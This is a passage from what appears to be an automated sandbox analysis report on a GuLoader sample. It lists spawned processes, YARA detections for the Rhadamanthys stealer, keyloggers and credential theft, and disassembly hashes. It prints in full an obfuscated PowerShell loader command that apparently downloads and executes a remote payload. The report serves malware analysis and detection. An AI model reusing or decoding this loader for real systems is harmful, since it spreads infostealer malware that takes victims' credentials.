;$niveauoplysning=$Bibeholdelsens[$Resigner]}$Aldersbestemmelserne=300108;$yellowcup=30110;Fortynderes (Elevtimens 'Te$ IgTaLDro SB oaLaL : uiK rS,RSnE tV e rR Rs Ai ,BNolSdyOo Ba=S PlgKaesaTWh-HacAlo WnM,TGueSeNditAn Su$Juh ijF eBaR N oe.tRBrS');Fortynderes (Elevtimens 'S,$Klg ,lPro pbU.aa,l p:EkcAnoMan nt crKoa.cr Fi uwMaiGosPeeEx =In El[NdSfuy Ss,ttS eUdmM .PoCS,o nUnvtreFyrM t S] T:E :GaF yr,qoBom ,B ,aL,s eO 6Me4raSIntE,rMaiCunReg a(.e$ TIUprNyrSpeLavSaePrr ssMiipob MlBeyno)');Fortynderes (Elevtimens ',o$StGTrlKuo Lb .a llTe:PemP,a CK rSD IUnm uEReRs IFonOmgShE rKrNDeEBrSud .o= D Ki[ sFdyEcs ,TBye amA .OrT uENaXS TCa.,keIsnKoCT.o BD.mIT nlyG r]Oo:Ha:Twa SsVeCGoi diSv. MG e FtS STrt,trL.iDin gBa( S$r cSwoBeNExtA.rYnAH RTiISpwskI ,SBre,u)');Fortynderes (Elevtimens ' T$ BGGaL OA bK ATilRa:LaaVeLStD UrK,eGon,kdKuEUn=Re$InmC.A sKPrSUnIOvMS ESar.rI lnScg ,EDeRQun Kemis c. sFou .bZaSGrtTirChIGen iG.a(P $Caa Al D eT,R Os SbTieNysCht.tE CmbrMF,EOpLJuSD.EOvrC nSne.d,Dj$v yCheInlP L O KwK cFoUC PS )');Fortynderes $Aldrende;"
                                                                                                              Imagebase:0x7ff741d30000
                                                                                                              File size:452'608 bytes
                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.1555228381.0000021D90071000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:5
                                                                                                              Start time:04:38:19
                                                                                                              Start date:05/12/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff75da10000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:7
                                                                                                              Start time:04:38:37
                                                                                                              Start date:05/12/2024
                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Kollationernendkaldebefjelses='Elefantridderne';;$Flumed='Rundingernes';;$Metropoler='Larceners';;$Provisionsindtgters='Drivremmen';;$Smedejernslaage=$host.Name;function Elevtimens($Ballongynges){If ($Smedejernslaage) {$Firspandets79=2} for ($Kollationerne=$Firspandets79;;$Kollationerne+=3){if(!$Ballongynges[$Kollationerne]) { break };$Bibliofil+=$Ballongynges[$Kollationerne];$Squibbery='Jogurternes'}$Bibliofil}function Fortynderes($Thuds){ .($Nongame) ($Thuds)}$Fangled=Elevtimens 'ToN rePltSi.Dew';$Fangled+=Elevtimens 'S E.ubC,c oLR.i HEStNs T';$Gasted=Elevtimens 'S.MAnoBazObiP l lAhaMe/';$Dealation=Elevtimens 'coTValSlsEj1Pl2';$Hiwire='St[LuNF,e.dtL . sCee SR Iv,lIRoc .eHyp .O ,iUnnRyTFrm.ia n maUdg oeMir L]Va:Ch:RaS Te Tc Su R AiPrt yMiPSpR fOinT PoAacN,ORkLNa= ,$ VDbeeAgA.uL ZaInTFlI.po AN';$Gasted+=Elevtimens 'An5 T.Co0 a(FuWWiigen KdBao ,wKosHo MaNReTU T1Fe0He.Da0 i;O TrW eiHenU 6 4J ;Fa ,mxSn6 o4Fi;B DrNivFy:Um1.e3Fo1U .,t0 ,)Se BeGNoeHjc,ok loEt/ H2I 0,n1Im0.v0Du1Ri0 P1Pr .kFj,iS,rSteDef,noVrxSk/Af1Ud3Ru1To.Ve0';$Endomysial=Elevtimens ',nuAsSHaE,kRRe-BiaOuGBaE n AT';$niveauoplysning=Elevtimens ' h StAnt bpTes T: h/Kh/UnpRatRas y.A gNor lo ,u Ap o/U aAlb ./P L aaInnBreHvyNo.Fod KsVap.r>CohEmt .tN.p,asK :R / / nwSmw uwFa.YapSkuRenHoeBae ut B. aaPee.n/AraCobS,/ LT,arenSpeC yO.. td oskrp';$Afpolitiserendes=Elevtimens ',a>';$Nongame=Elevtimens 'RuIK,enoX';$Stripperne='Bystyrers';$Assumptiveness='\Nonfattening.Ret';Fortynderes (Elevtimens ' P$UnGSelL.o BE,AFllH : ,F No Pr SS ,DNoeNo=Co$DiER NLiVLy: ABoP lPP D PA .t a M+sa$Baa ,SDosCaU uM pUdTMeiViV tESuN e DS.uS');Fortynderes (Elevtimens 'Ex$ kgMalUnOBab,eA LGr:K BRuIPrbTue Kh.wo ,lroDFle MLBuS ueS,n vSAb=,y$Ovn SIS vFoeTiAAcU TospPViLInYPlSKvnUniKoN LG .MesS PGrLAlIVat S(Af$PrAUnf ePNyO LPoISetB iRrS.pED R rE yNMudPrETvSMa)');Fortynderes (Elevtimens $Hiwire);$niveauoplysning=$Bibeholdelsens[0];$heda=(Elevtimens ' a$MagLalgaOPrBR,ARuLA :MysKotulr aM smNoeOk=Inn aE uW S-UnODiB ,J eFoc ItPu R SG Y oSF TL.eD MBl.re$SufMbAInn KgDelPae id');Fortynderes ($heda);Fortynderes (Elevtimens 'Fo$E S StubrLem im UeCu. HSleToaPad.neSkrPasHa[N $P EShnGtd Ao fm cySes riBaaPrlbo]Tr=Un$AlG FaLus tAne Cd');$Preposed=Elevtimens ' O$AfSP,tTyrp.mHem.oe,n.SnDAcoCrwGrn Ol LoCoaMyd aFO iStlSteTi(As$ On niPrvRue a TuMuoC,pSul kySasFanK iManRogko,P,$InHMajgaewarben neMirBjsRe)';$Hjerners=$Forsde;Fortynderes (Elevtimens ' .$,nGtiL o.oBBlA ll s:HaDEar,eiO,KTeKroeDiV .aChrAle fR SN.ie esPa=Hi( et ,EMesS T K-PePAla EtDahSi An$BehlgjGgeOvRUnnLeE rrSksHa)');while (!$Drikkevarernes) {Fortynderes (Elevtimens ' t$ gBelIno b aIrlHj: LPOmrV oU.tEneGes ptUns,lyp r F=,u$ ,A on stMyi Sc waY p,li St a hl SiSusmit aiAnc') ;Fortynderes $Preposed;Fortynderes (Elevtimens ' oSH,t PaS rHaTSo-E sRelEnE.ieMupCh M4');Fortynderes (Elevtimens ' I$PrGInlSeO NBBlASkLDe:Vedi RS IRdKT.kViES vMiaKlR DePerJuNPoeCaSB,=El( ut aE RsKuTSo-PrPA AF,t oHen No$SnHStj leK rHinTee jRGoSDr)') ;Fortynderes (Elevtimens ' $ lgWhl SOKnBF aP LD :jer ,EfrSDyI GLiN E SR u=Hj$LaG ulLoOp b tA rl u:deTnaES kS s Pt FM AAShr dK.fEBrr HI DnragPa+Ko+Si%S $I BK IB B ,EDkhFeO IL SDPaECaLBrSDierenDeS h.Pec .OAcuScNT.t') ;$niveauoplysning=$Bibeholdelsens[$Resigner]}$Aldersbestemmelserne=300108;$yellowcup=30110;Fortynderes (Elevtimens 'Te$ IgTaLDro SB oaLaL : uiK rS,RSnE tV e rR Rs Ai ,BNolSdyOo Ba=S PlgKaesaTWh-HacAlo WnM,TGueSeNditAn Su$Juh ijF eBaR N oe.tRBrS');Fortynderes (Elevtimens 'S,$Klg ,lPro pbU.aa,l p:EkcAnoMan nt crKoa.cr Fi uwMaiGosPeeEx =In El[NdSfuy Ss,ttS eUdmM .PoCS,o nUnvtreFyrM t S] T:E :GaF yr,qoBom ,B ,aL,s eO 6Me4raSIntE,rMaiCunReg a(.e$ TIUprNyrSpeLavSaePrr ssMiipob MlBeyno)');Fortynderes (Elevtimens ',o$StGTrlKuo Lb .a llTe:PemP,a CK rSD IUnm uEReRs IFonOmgShE rKrNDeEBrSud .o= D Ki[ sFdyEcs ,TBye amA .OrT uENaXS TCa.,keIsnKoCT.o BD.mIT nlyG r]Oo:Ha:Twa SsVeCGoi diSv. MG e FtS STrt,trL.iDin gBa( S$r cSwoBeNExtA.rYnAH RTiISpwskI ,SBre,u)');Fortynderes (Elevtimens ' T$ BGGaL OA bK ATilRa:LaaVeLStD UrK,eGon,kdKuEUn=Re$InmC.A sKPrSUnIOvMS ESar.rI lnScg ,EDeRQun Kemis c. sFou .bZaSGrtTirChIGen iG.a(P $Caa Al D eT,R Os SbTieNysCht.tE CmbrMF,EOpLJuSD.EOvrC nSne.d,Dj$v yCheInlP L O KwK cFoUC PS )');Fortynderes $Aldrende;"
                                                                                                              Imagebase:0x810000
                                                                                                              File size:433'152 bytes
                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000007.00000002.1789176550.000000000952F000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000007.00000002.1773360781.000000000607D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000007.00000002.1788756051.0000000008D70000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:8
                                                                                                              Start time:04:38:37
                                                                                                              Start date:05/12/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff75da10000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:9
                                                                                                              Start time:04:38:59
                                                                                                              Start date:05/12/2024
                                                                                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                                              Imagebase:0x930000
                                                                                                              File size:59'904 bytes
                                                                                                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000009.00000003.1942766561.0000000023B10000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000009.00000003.1940336602.0000000000130000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000009.00000003.1942589272.00000000238F0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000009.00000003.1955237609.00000000232F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:13
                                                                                                              Start time:04:39:19
                                                                                                              Start date:05/12/2024
                                                                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Windows\System32\svchost.exe"
                                                                                                              Imagebase:0x790000
                                                                                                              File size:46'504 bytes
                                                                                                              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000D.00000003.1943543611.0000000002DE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000D.00000003.1946639469.00000000056C0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000D.00000003.1946474653.00000000054A0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000D.00000002.2033441930.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:14
                                                                                                              Start time:04:39:28
                                                                                                              Start date:05/12/2024
                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Windows\System32\svchost.exe"
                                                                                                              Imagebase:0x7ff7b4ee0000
                                                                                                              File size:55'320 bytes
                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000003.2172788749.0000024F6AAC9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000003.2195173707.0000024F6AACB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000003.2194338542.0000024F6AACA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000003.2194235697.0000024F6AACC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000003.2193874788.0000024F6AACC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:15
                                                                                                              Start time:04:39:39
                                                                                                              Start date:05/12/2024
                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline: --user-data-dir="C:\Users\user~1\AppData\Local\Temp\chr1B0.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/a506004f/bd5c97e1"
                                                                                                              Imagebase:0x7ff6c4390000
                                                                                                              File size:3'242'272 bytes
                                                                                                              MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:16
                                                                                                              Start time:04:39:39
                                                                                                              Start date:05/12/2024
                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                              Imagebase:0x7ff7b4ee0000
                                                                                                              File size:55'320 bytes
                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:false

                                                                                                              General

                                                                                                              Target ID:17
                                                                                                              Start time:04:39:40
                                                                                                              Start date:05/12/2024
                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2484 --field-trial-handle=2460,i,18042430906892468815,13956811968867216056,262144 /prefetch:8
                                                                                                              Imagebase:0x7ff6c4390000
                                                                                                              File size:3'242'272 bytes
                                                                                                              MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:18
                                                                                                              Start time:04:39:41
                                                                                                              Start date:05/12/2024
                                                                                                              Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline: --user-data-dir="C:\Users\user~1\AppData\Local\Temp\chrBB3.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/a506004f/0da50779"
                                                                                                              Imagebase:0x7ff7fb980000
                                                                                                              File size:4'210'216 bytes
                                                                                                              MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:19
                                                                                                              Start time:04:39:42
                                                                                                              Start date:05/12/2024
                                                                                                              Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2724 --field-trial-handle=2140,i,8472983126919404237,17192914109164823712,262144 /prefetch:3
                                                                                                              Imagebase:0x7ff7fb980000
                                                                                                              File size:4'210'216 bytes
                                                                                                              MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:21
                                                                                                              Start time:04:40:00
                                                                                                              Start date:05/12/2024
                                                                                                              Path:C:\Program Files\Windows Media Player\wmplayer.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Program Files\Windows Media Player\wmplayer.exe"
                                                                                                              Imagebase:0x7ff766690000
                                                                                                              File size:171'008 bytes
                                                                                                              MD5 hash:89DCD2D4C0EC638AADC00D3530E07E1D
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:false

                                                                                                              General

                                                                                                              Target ID:22
                                                                                                              Start time:04:40:05
                                                                                                              Start date:05/12/2024
                                                                                                              Path:C:\Windows\System32\dllhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Windows\system32\dllhost.exe"
                                                                                                              Imagebase:0x7ff7d8730000
                                                                                                              File size:21'312 bytes
                                                                                                              MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:false

                                                                                                              Disassembly

                                                                                                              Reset < >

                                                                                                                Executed Functions

                                                                                                                Function 00007FFAAC338B9A Relevance: 1.1, Instructions: 1052COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1566525771.00007FFAAC330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC330000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_7ffaac330000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9dfe1f23a3edb56ec9bb3dc87339e75561efb82c0aff33d84825f6be6e6e55bc
                                                                                                                • Instruction ID: ac769b49b4f7945c3369e28b249db3254dcb82c4cdc81fd99f086aa1f5278ae1
                                                                                                                • Opcode Fuzzy Hash: 9dfe1f23a3edb56ec9bb3dc87339e75561efb82c0aff33d84825f6be6e6e55bc
                                                                                                                • Instruction Fuzzy Hash: A8623872A0EF8A8FF75597289855974BBD1EF96210B0841BBD04EC72D3DE19EC0A83D1
                                                                                                                Function 00007FFAAC26ABA5 Relevance: .4, Instructions: 396COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1566079602.00007FFAAC260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC260000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_7ffaac260000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6895633ef70d48442acebfb4c68333c204e4d48cb40d7b0eb585dd00b3f07de9
                                                                                                                • Instruction ID: 6bfa19c5119595ac55c06287a3d1d18a054f69727a7481a6b84843c6456e3671
                                                                                                                • Opcode Fuzzy Hash: 6895633ef70d48442acebfb4c68333c204e4d48cb40d7b0eb585dd00b3f07de9
                                                                                                                • Instruction Fuzzy Hash: 78D16370A18A4DCFEBA8EF28C8557E977D1FB65301F14826AD80EC7395DB34D9448B81
                                                                                                                Function 00007FFAAC26B955 Relevance: .4, Instructions: 379COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1566079602.00007FFAAC260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC260000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_7ffaac260000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 36e6b3ad9b7198f22593931fef21af4078d0ee0020de03012cca8f714be278b4
                                                                                                                • Instruction ID: 76d8e56391c4a8e5967483560e22285565c1847040b3f16651468026eb4e546b
                                                                                                                • Opcode Fuzzy Hash: 36e6b3ad9b7198f22593931fef21af4078d0ee0020de03012cca8f714be278b4
                                                                                                                • Instruction Fuzzy Hash: 8BD17370A18A4E8FEBA8EF28C8557E977D1FB64300F14826AD80DC7395CE74D9498BC1
                                                                                                                Function 00007FFAAC26CFCF Relevance: 1.9, Strings: 1, Instructions: 666COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1566079602.00007FFAAC260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC260000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_7ffaac260000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 6
                                                                                                                • API String ID: 0-1452363761
                                                                                                                • Opcode ID: 8966515bda19bfe066d178e585cb48cea693cfd267fd690c80624e17ba6038f7
                                                                                                                • Instruction ID: 7d0756b76ca82750cd37539565bc6e92c2cd995f760805b6b25cf651747e5e03
                                                                                                                • Opcode Fuzzy Hash: 8966515bda19bfe066d178e585cb48cea693cfd267fd690c80624e17ba6038f7
                                                                                                                • Instruction Fuzzy Hash: E1227130A18A4D8FDF98EF5CC495AA9BBE1FFA9310F104169D40ED7295CB35E885CB81
                                                                                                                Function 00007FFAAC3395F2 Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1566525771.00007FFAAC330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC330000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_7ffaac330000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 6
                                                                                                                • API String ID: 0-1452363761
                                                                                                                • Opcode ID: aef35f66946c9d9e9ea1448a661c324e7e710617455279257958ef288ba31708
                                                                                                                • Instruction ID: c8a5a7c14dbfbd0fe0edd777952bec6b2b1807acc62dacc4e2a84bac39c188ae
                                                                                                                • Opcode Fuzzy Hash: aef35f66946c9d9e9ea1448a661c324e7e710617455279257958ef288ba31708
                                                                                                                • Instruction Fuzzy Hash: CB91C6A2A0EBC58FF7959B688855968FFD1EF56210F1840FED08EC72D3DD189C498392
                                                                                                                Function 00007FFAAC33A262 Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1566525771.00007FFAAC330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC330000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_7ffaac330000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 6
                                                                                                                • API String ID: 0-1452363761
                                                                                                                • Opcode ID: d5498b54a325ca6f64011f509e7ff7b40151e6fa8581800019adc01a1cff939f
                                                                                                                • Instruction ID: 403388fe8d5cc0a92e7477438b8ec3055a02d3bb7a694032728beadbf55816cc
                                                                                                                • Opcode Fuzzy Hash: d5498b54a325ca6f64011f509e7ff7b40151e6fa8581800019adc01a1cff939f
                                                                                                                • Instruction Fuzzy Hash: 2C915AA2A0EBC14FF755D7A88855A68BBD1EF56310F0850FED08DD72D3DE18AC498392
                                                                                                                Function 00007FFAAC33AA72 Relevance: 1.5, Strings: 1, Instructions: 275COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1566525771.00007FFAAC330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC330000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_7ffaac330000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 6
                                                                                                                • API String ID: 0-1452363761
                                                                                                                • Opcode ID: c1ab7a750da23f6eef3d05cd228b1fd1ab3e57ff59c4ad20a8cbf3865f8a0e01
                                                                                                                • Instruction ID: ff0ea4d4b355c466ba38e602297e3df90c933040d935904d471cd37ee40d823f
                                                                                                                • Opcode Fuzzy Hash: c1ab7a750da23f6eef3d05cd228b1fd1ab3e57ff59c4ad20a8cbf3865f8a0e01
                                                                                                                • Instruction Fuzzy Hash: 1F9108A290EBC54FF75597A88855A68BBE1FF56600F0840FED08DD72D3DD28AC498392
                                                                                                                Function 00007FFAAC33121F Relevance: 1.3, Strings: 1, Instructions: 79COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1566525771.00007FFAAC330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC330000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_7ffaac330000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 8h
                                                                                                                • API String ID: 0-2550175997
                                                                                                                • Opcode ID: 418f080bd5c122c56fe112b36ee9a5f9aa8c913ae359880c0211c24c851aea46
                                                                                                                • Instruction ID: bddeb06476399d67fedaa881cb0340e0317ed476dbb0ba1082d028423280caa2
                                                                                                                • Opcode Fuzzy Hash: 418f080bd5c122c56fe112b36ee9a5f9aa8c913ae359880c0211c24c851aea46
                                                                                                                • Instruction Fuzzy Hash: B021B292D0FBC58FF35697380866864BFA1DF67650B0894FAD08DCB1D7D8089C4D87A6
                                                                                                                Function 00007FFAAC334409 Relevance: .5, Instructions: 526COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1566525771.00007FFAAC330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC330000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_7ffaac330000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 1425a4ce1e225b82a03963a3224bf1acf89db6aebda89c3ad2ee81984d27773e
                                                                                                                • Instruction ID: 7b46da7ad242289859987c3f791cc0a3eeac6d4f2fe374e7cdb0caaaf5671d2a
                                                                                                                • Opcode Fuzzy Hash: 1425a4ce1e225b82a03963a3224bf1acf89db6aebda89c3ad2ee81984d27773e
